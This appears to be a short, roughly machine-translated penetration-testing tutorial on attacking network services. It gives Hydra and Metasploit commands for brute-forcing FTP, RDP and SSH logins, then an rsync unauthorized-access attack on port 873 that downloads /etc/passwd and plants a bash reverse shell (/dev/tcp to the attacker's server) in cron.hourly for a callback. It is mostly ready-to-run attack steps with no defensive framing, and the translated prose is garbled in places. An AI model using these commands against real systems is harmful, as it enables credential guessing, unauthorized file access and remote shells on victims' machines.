Service vulnerabilities

FTP

Password blasting tools for services

There are Hydra and beautiful young woman tools

Hydra and MSF

Personally, I prefer to use MSF

But both tools need to be understood

In the early stage, it must be port scanning

So which ports can be scanned specifically? You can scan for 3389.21.22.445 Etc. login port

Hydra

hydra IP ftp -l  user name  -P  Password dictionary  -t  Threads ( Default 16) -vV

hydra IP ftp -l  user name  -P  Password dictionary  -e ns -vV

MSF

Start by opening MSF

Search for

search ftp_login

Then call the searched module

msf6 > use 0

Then check the contents that need to be configured

show options

The dictionary path is made by yourself

Configuration complete

Check it

See if there is any configuration error

show options

After checking that there are no problems

You can execute run Yes

Then log in remotely

RDP 3389

hydra ip rdp -L users.txt -P pass.txt -V

SSH

This is the case. , I also prefer to use MSF Medium SSH_login

search ssh_Login

Configuration information is and FTP Almost import account and password dictionary , Designated target ip

rsync Unauthorized access exploit ( port 873)

 Judge ：rsync rsync://xxx:873/

 utilize ：

- Read the file ：rsync rsync://xxx:873/src/

- Download the file ：rsync rsync://xxx:873/src/etc/passwd ./

- Upload files ：rsync -av passwd rsync://xxx:873/src/tmp/passwd

 rebound shell：

1、 pick up information ：

rsync rsync://xxx:873/src/etc/crontab /root/cron.txt

2. create a file  

touch shell 

\#!/bin/bash 

/bin/bash -i >& /dev/tcp/ Bounce to your server ip/5566 0>&1

chmod +x shell		

3、 Upload files  

rsync -av shell rsync://xxx:873/src/etc/cron.hourly 

4、 Waiting to accept the rebound